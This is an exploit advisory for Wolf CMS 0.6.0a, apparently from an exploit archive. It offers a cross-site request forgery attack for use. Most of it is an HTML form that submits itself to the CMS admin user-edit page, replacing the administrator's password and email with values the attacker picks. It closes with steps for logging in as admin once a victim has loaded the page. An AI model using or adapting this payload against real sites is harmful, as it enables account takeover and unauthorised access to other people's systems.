Wolf CMS version 0.6.0a cross site request forgery exploit that changes the administrator password.
f3287a8a592bff5bf04b1472cb1fbec6e0bd3da4ab96a273f79f9f977a79f2c9
Exploit Title: Wolf CMS Change Admin Password CSRF
Date: 2010-04-03
Author: Stefan M.
Software Link: http://www.wolfcms.org/
Version: 0.6.0a
Email: stefo@cia.com
GreeTz to: d14l(a.k.a Teo) & baltazar
--- START OF HTML CODE ---
<form action="http://[website]/admin/?/user/edit/1" method="post">
<input class="textbox" id="user_name" maxlength="100" name="user[name]" size="100" type="text" value="Administrator" />
<input class="textbox" id="user_email" maxlength="255" name="user[email]" size="255" type="text" value="[your email]" />
<input class="textbox" id="user_username" maxlength="40" name="user[username]" size="40" type="text" value="admin" disabled="disabled" />
<input class="textbox" id="user_password" maxlength="40" name="user[password]" size="40" type="password" value="[enter desired password]" />
<input class="textbox" id="user_confirm" maxlength="40" name="user[confirm]" size="40" type="password" value="[repeat the password]" />
<input checked="checked" id="user_permission-administrator" name="user_permission[administrator]" type="checkbox" value="1" />
<input id="user_permission-developer" name="user_permission[developer]" type="checkbox" value="2" />
<input id="user_permission-editor" name="user_permission[editor]" type="checkbox" value="3" />
<select class="select" id="user_language" name="user[language]">
<option value="bn">Bengali</option>
<option value="zh">Chinese</option>
<option value="hr">Croatian</option>
<option value="cs">Czech</option>
<option value="da">Danish</option>
<option value="nl">Dutch</option>
<option value="en" selected="selected">English</option>
<option value="fr">French</option>
<option value="de">German</option>
<option value="hu">Hungarian</option>
<option value="id">Indonesian</option>
<option value="it">Italian</option>
<option value="ja">Japanese</option>
<option value="no">Norwegian</option>
<option value="pl">Polish</option>
<option value="pt">Portuguese</option>
<option value="ru">Russian</option>
<option value="es">Spanish</option>
<option value="sv">Swedish</option>
</select>
<script>document.forms[0].submit()</script>
</form>
--- END OF HTML CODE ---
You dont have to change username of the administrator,since this code will change the
password of the user with the ID 1.
After the victim executes this code,the password will be changed to your desired password.
Later,just visit: http://[website]/admin/?/login
and type
username: admin
password: [desired password]
# If you have any questions whatsoever,feel free to contact me.